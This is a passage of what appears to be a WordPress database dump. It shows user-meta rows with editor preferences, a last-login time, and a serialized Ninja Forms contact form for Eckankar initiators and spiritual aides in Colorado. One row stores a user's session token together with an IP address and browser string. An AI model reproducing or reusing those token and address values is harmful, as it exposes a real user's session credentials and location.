22:04:50'),(2284,15,'wfls-last-login','1700584093'),(2285,15,'hesh_surveyNoticeDismissedB',''),(2286,15,'hesh_theme','wordpress'),(2287,15,'hesh_tabSize','4'),(2288,15,'hesh_lineWrapping','1'),(2289,15,'hesh_lineNumbers','1'),(2290,15,'hesh_fontSize','13'),(2291,15,'hesh_lineHeight','1.5'),(2292,15,'hesh_matchBrackets',''),(2293,15,'hesh_matchTags',''),(2294,15,'hesh_highlightSelectionMatches',''),(2295,15,'hesh_autoCloseTags',''),(2296,15,'hesh_autoCloseBrackets',''),(2297,15,'hesh_foldGutter',''),(2298,15,'hesh_scrollbarStyle',''),(2299,15,'hesh_keyMap','default'),(2300,15,'user_last_view_date','20230604151525'),(2301,15,'user_last_view_date_events','20231121094111'),(2302,15,'bglibDashboardOrder','1'),(2303,15,'wpcl_dashboard_quick_press_last_post_id','269391'),(2304,15,'community-events-location','a:1:{s:2:\"ip\";s:12:\"184.96.219.0\";}'),(2305,15,'sgg-tutorial_was_showed','1'),(2306,15,'closedpostboxes_dashboard','a:1:{i:0;s:32:\"wp_mail_smtp_reports_widget_lite\";}'),(2307,15,'metaboxhidden_dashboard','a:7:{i:0;s:22:\"boldgrid-notifications\";i:1;s:32:\"wp_mail_smtp_reports_widget_lite\";i:2;s:18:\"dashboard_activity\";i:3;s:20:\"boldgrid_news_widget\";i:4;s:24:\"boldgrid_feedback_widget\";i:5;s:21:\"dashboard_quick_press\";i:6;s:17:\"dashboard_primary\";}'),(2308,15,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:119:\"boldgrid-notifications,dashboard_right_now,wp_mail_smtp_reports_widget_lite,dashboard_activity,mec_widget_news_features\";s:4:\"side\";s:107:\"boldgrid_news_widget,boldgrid_feedback_widget,dashboard_quick_press,dashboard_primary,dashboard_site_health\";s:7:\"column3\";s:32:\"wordfence_activity_report_widget\";s:7:\"column4\";s:0:\"\";}'),(2309,15,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:23:\"boldgrid_backup_renamed\";s:9:\"timestamp\";i:1641585834;}'),(2325,15,'session_tokens','a:1:{s:64:\"6f48f437b3cff56e833157fe74f84d4efd109a23d9725a22c5c51e1eb4a50b35\";a:4:{s:10:\"expiration\";i:1700756893;s:2:\"ip\";s:13:\"184.96.219.55\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\";s:5:\"login\";i:1700584093;}}'),(3621,2,'wpcl_nf_form_preview_32','a:4:{s:2:\"id\";i:32;s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:35:\"Central Colorado Initiator and ESAs\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 16:58:32\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797718830\";i:9;s:10:\"submit_104\";i:10;s:18:\"html_1663797717432\";}s:17:\"allow_public_link\";s:1:\"0\";s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";s:24:\"form_title_heading_level\";s:1:\"3\";}s:6:\"fields\";a:11:{i:285;a:1:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_93\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1248:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1181:\"<p></p>\n<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong>Central Colorado Initiator and ESA\'s</strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:7:\"html_93\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:286;a:1:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_94\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_94\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";}}i:287;a:1:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_95\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_95\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";}}i:288;a:1:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_96\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_96\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:289;a:1:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_97\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_97\";s:5:\"value\";s:0:\"\";}}i:290;a:1:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 